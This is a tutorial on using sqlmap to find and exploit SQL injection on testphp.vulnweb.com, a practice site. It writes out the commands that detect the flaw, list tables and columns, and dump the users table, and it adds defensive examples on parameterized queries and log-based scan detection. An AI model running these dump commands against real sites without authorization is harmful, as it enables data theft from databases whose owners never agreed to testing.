How To Perform SQL Injection Using Sqlmap Tool

In this increasingly advanced digital era, data protection has become crucial. However, cyber attacks are becoming more sophisticated and diverse, and one of them is SQL injection. This attack has become a serious threat to web applications and vulnerable databases. SQL injection is an attack that exploits vulnerabilities in the SQL query processing mechanism of a web application.

Through this security loophole, attackers can inject malicious SQL commands that are executed by the system, thus gaining unauthorized access to sensitive data, damaging or even deleting data, and even taking control of the compromised system. In this article, we will perform SQL injection using the sqlmap tool, targeting a live web application built specifically for penetration testing practice. It's important to note that the author will not carry out any attacks on real live targets without proper authorization from the relevant parties, as that would be a violation, of course. Before we proceed, do you know what the sqlmap tool is?

Sqlmap

The author will provide an explanation about the tool. So, SQLMap is a popular open-source tool used for web application penetration testing with the purpose of detecting and exploiting security vulnerabilities related to SQL injection. SQLMap is designed to assist security professionals and researchers in identifying SQL injection vulnerabilities in web applications and conducting automated penetration testing. SQL injection is an attack that exploits security vulnerabilities in web applications that use SQL queries to interact with databases. This attack allows an attacker to inject malicious SQL commands into user-provided inputs, enabling them to manipulate and retrieve data from the database, and even gain control over the entire system.
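To make the mechanism described above concrete from the defender's side, here is an added example (not code from the original article or from the SQLMap project) showing the flaw SQLMap hunts for and its fix. It assumes a hypothetical product lookup like the `product.php?pic=1` page used later in the article, rebuilt with Python's built-in sqlite3 and a constructed in-memory table: one function pastes the `pic` value straight into the SQL text, the other binds it as a query parameter so the database never parses it as SQL.

```python
import sqlite3
from typing import Optional

def make_db() -> sqlite3.Connection:
    """Constructed sample table standing in for the shop's products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "Camera", 199.0), (2, "Lens", 89.5), (3, "Tripod", 35.0)],
    )
    return conn

def lookup_vulnerable(conn: sqlite3.Connection, pic: str) -> list:
    """The injectable pattern: the request parameter becomes part of the SQL text.
    Whatever the client sends after 'id = ' is parsed as SQL, which is exactly
    what a scanner such as SQLMap probes for."""
    sql = f"SELECT id, name, price FROM products WHERE id = {pic}"
    return conn.execute(sql).fetchall()

def lookup_safe(conn: sqlite3.Connection, pic: str) -> list:
    """The fixed pattern: the SQL text is fixed and the value is bound as a
    parameter, so the database compares it as data and never executes it."""
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return conn.execute(sql, (pic,)).fetchall()

def validate_pic(pic: str) -> Optional[int]:
    """Second layer of defence: reject anything that is not a plain integer id
    before it reaches the database at all."""
    return int(pic) if pic.isdigit() else None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input :", lookup_vulnerable(db, "1"))
    print("vulnerable, crafted input:", lookup_vulnerable(db, "1 OR 1=1"))
    print("safe, normal input       :", lookup_safe(db, "1"))
    print("safe, crafted input      :", lookup_safe(db, "1 OR 1=1"))
    print("validated crafted input  :", validate_pic("1 OR 1=1"))
```

Running the script shows the difference that matters: the vulnerable lookup returns every row for the crafted input, while the parameterized lookup returns nothing, because `1 OR 1=1` is compared as a literal value against the `id` column. Parameter binding is the primary fix; the integer validation is a cheap additional layer, not a replacement for it.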

SQLMap works by identifying and exploiting SQL injection vulnerabilities in web applications. The tool employs a range of techniques and strategies to search for vulnerable parameters, test whether the web application can be exploited using specific SQL commands, and extract sensitive information from the connected database. SQLMap can be used through a powerful command-line interface, providing flexibility for users to customize their attacks. The tool supports various types of databases such as MySQL, Oracle, PostgreSQL, Microsoft SQL Server, and more. Additionally, SQLMap offers features like obtaining database structure, data exfiltration, executing shell commands, and much more.

However, it's important to note that SQLMap should only be used for legitimate purposes and with permission from the system owner being tested. Using SQLMap or similar tools without proper authorization can be considered illegal. Thus, SQLMap serves as an essential tool for security professionals and researchers to test and enhance the security of web applications by detecting and addressing potentially damaging SQL injection vulnerabilities.

Install

To install SQLMap, make sure you have already installed the Python programming language on your system, as SQLMap is written in Python. You can visit python.org to install Python. Here, the author is using the Windows operating system, but you can follow the same steps regardless. If you are installing it on Termux, ensure that you have installed both Python and Git.

  1. First, clone the repository by typing the command below in your terminal:

         git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

  2. When it is installed, you will see something like this:

  3. The author will rename sqlmap-dev to just sqlmap using the following Windows command:

         ren sqlmap-dev sqlmap

  4. For Linux users, you can do it like this:

         mv sqlmap-dev sqlmap

  5. When the installation is complete, navigate to the directory where SQLMap was installed, like this:

         cd sqlmap

Usage

  1. To view the options of SQLMap, you can run this command:

         python sqlmap.py -h

  2. For the attack, we will target a live web application specifically designed for penetration testing, as mentioned earlier. The live web application is:

         http://testphp.vulnweb.com/product.php?pic=1

  3. We will detect whether the target is vulnerable to SQL injection attacks. To do so, we need to type the following command (the URL is quoted so the shell does not interpret the ? and = characters):

         python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1"

  4. You will see the results when the target is vulnerable to SQL injection attacks:

  5. The author will retrieve the target database tables using the following command:

         python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --tables

  6. When successfully obtained:

  7. There are 8 tables in the "acuart" database and 79 tables in the "information_schema" database. The interesting part is that we can retrieve a specific column, database, and table that we target. How can we do that? Let's say the author wants to retrieve the "users" table from the "acuart" database and list its columns. Here's how you can do it (the option is --columns, plural):

         python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --columns -D acuart -T users

  8. Result:

  9. Lastly, we will dump the data using the following command:

         python sqlmap.py -u "http://testphp.vulnweb.com/product.php?pic=1" --dump -D acuart -T users

     Before the dump, SQLMap will show an input prompt (for example, asking whether to try a dictionary attack on any password hashes it finds, much like other tools and techniques do). You just need to enter "n", which means "no", to skip that step and finish the data dump quickly.

  10. The result when the data dumping process is successful:

  11. Finished.
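The scan above is also visible from the other side of the connection, so here is an added example (not part of the original article and not SQLMap's own code) of how a defender can spot this kind of activity in a web server's access log. It parses constructed Combined Log Format lines and raises two kinds of findings: a client whose User-Agent announces itself as sqlmap (the tool's default User-Agent string starts with "sqlmap/" unless the tester changes it), and a client that sends many distinct values for one parameter of one path, which is how an injection scanner behaves regardless of its User-Agent. The IP addresses, timestamps and threshold are assumptions chosen for the sample.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip ident user [time] "METHOD url PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: one ordinary visitor and one client probing the pic parameter.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Jun/2023:10:00:01 +0000] "GET /product.php?pic=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Jun/2023:10:00:09 +0000] "GET /product.php?pic=2 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Jun/2023:10:05:00 +0000] "GET /product.php?pic=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.7 - - [12/Jun/2023:10:05:00 +0000] "GET /product.php?pic=1%27 HTTP/1.1" 200 4980 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.7 - - [12/Jun/2023:10:05:01 +0000] "GET /product.php?pic=1%22 HTTP/1.1" 200 4980 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.7 - - [12/Jun/2023:10:05:01 +0000] "GET /product.php?pic=1%29 HTTP/1.1" 200 4980 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.7 - - [12/Jun/2023:10:05:02 +0000] "GET /product.php?pic=1%27%29 HTTP/1.1" 200 4980 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
198.51.100.7 - - [12/Jun/2023:10:05:02 +0000] "GET /product.php?pic=1. HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
"""

def parse_line(line: str):
    """Return a dict with ip, path, decoded query params and user agent, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "params": parse_qs(parts.query),  # values are URL-decoded here
        "ua": m.group("ua"),
    }

def analyze(lines, burst_threshold: int = 5) -> list:
    """Return findings as (kind, client_ip, detail) tuples."""
    findings = []
    flagged_ua_ips = set()
    # (ip, path, param) -> set of distinct values seen for that parameter
    probes = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        # Finding 1: the scanner's default User-Agent, reported once per client
        if "sqlmap" in rec["ua"].lower() and rec["ip"] not in flagged_ua_ips:
            flagged_ua_ips.add(rec["ip"])
            findings.append(("sqlmap_user_agent", rec["ip"], rec["ua"]))
        for param, values in rec["params"].items():
            probes[(rec["ip"], rec["path"], param)].update(values)
    # Finding 2: many different values for one parameter of one path from one client
    for (ip, path, param), values in probes.items():
        if len(values) >= burst_threshold:
            detail = f"{path}?{param}: {len(values)} distinct values"
            findings.append(("parameter_fuzzing", ip, detail))
    return findings

if __name__ == "__main__":
    for kind, ip, detail in analyze(SAMPLE_LOG.splitlines()):
        print(f"{kind:20} {ip:15} {detail}")
```

On the sample the ordinary visitor produces nothing, while the probing client is reported twice: once for its User-Agent and once for sending six different `pic` values to `/product.php`. The second rule is the one worth keeping in production, since the User-Agent is trivially changed; the threshold and time window should be tuned against your own traffic to avoid flagging legitimate browsing of many products.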

Closing

The methods described above by the author are just a few examples, as SQLMap offers many more capabilities that you can explore and practice on your own using the commands and options mentioned earlier. With this article, you can gain an understanding of why attackers can quickly exploit database vulnerabilities, even without in-depth knowledge of the target system. Hopefully, you find this information useful.